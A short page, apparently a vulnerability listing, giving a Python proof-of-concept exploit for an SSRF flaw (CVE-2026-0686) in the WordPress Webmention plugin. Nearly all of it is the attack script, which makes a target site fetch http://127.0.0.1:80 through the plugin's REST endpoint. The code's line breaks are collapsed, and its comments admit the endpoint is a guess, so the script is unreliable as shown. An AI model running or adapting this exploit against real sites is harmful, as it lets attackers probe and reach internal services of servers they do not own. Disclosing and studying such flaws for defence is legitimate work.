CVE-2026-0686: WordPress Webmention插件SSRF漏洞

#!/usr/bin/env python3 # Proof of Concept for CVE-2026-0686 (SSRF in WordPress Webmention Plugin) # Usage: python3 poc.py <target_url> import requests import sys if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <http://target-site.com>") sys.exit(1) target = sys.argv[1].rstrip('/') # The endpoint for webmention is typically /?webmention=endpoint or similar, checking standard WordPress structure # Usually handled by the plugin hooking into the post request. # Based on the vulnerability, we send a request to the receiver. # Attacker controlled server (or internal target) # In a real SSRF, 'source' would be a URL the server visits. # Here we try to make the server fetch an internal resource. internal_target = "http://127.0.0.1:80" # Example: Localhost scan victim_post = f"{target}/?p=1" # Arbitrary post ID # The Webmention payload payload = { 'source': internal_target, 'target': victim_post } print(f"[*] Attempting to trigger SSRRF on {target}") print(f"[*] Trying to force server to connect to: {internal_target}") try: # Sending POST request to the webmention endpoint # Note: The exact endpoint might vary depending on WordPress configuration, # but often it is handled by the plugin intercepting the request. # Common endpoint path discovered in similar plugins is just the base URL with specific parameters or a fixed path. # We will try the standard endpoint. # Based on the plugin code reference (Receiver::post), it listens for webmention requests. endpoint = f"{target}/wp-json/webmention/1.0/endpoint" # REST API endpoint commonly used response = requests.post(endpoint, data=payload, timeout=5) if response.status_code == 202: # Accepted print("[+] Request accepted by server. The server may have sent a request to the internal target.") else: print(f"[-] Server returned status code: {response.status_code}") print(f"Response: {response.text}") except Exception as e: print(f"Error: {e}")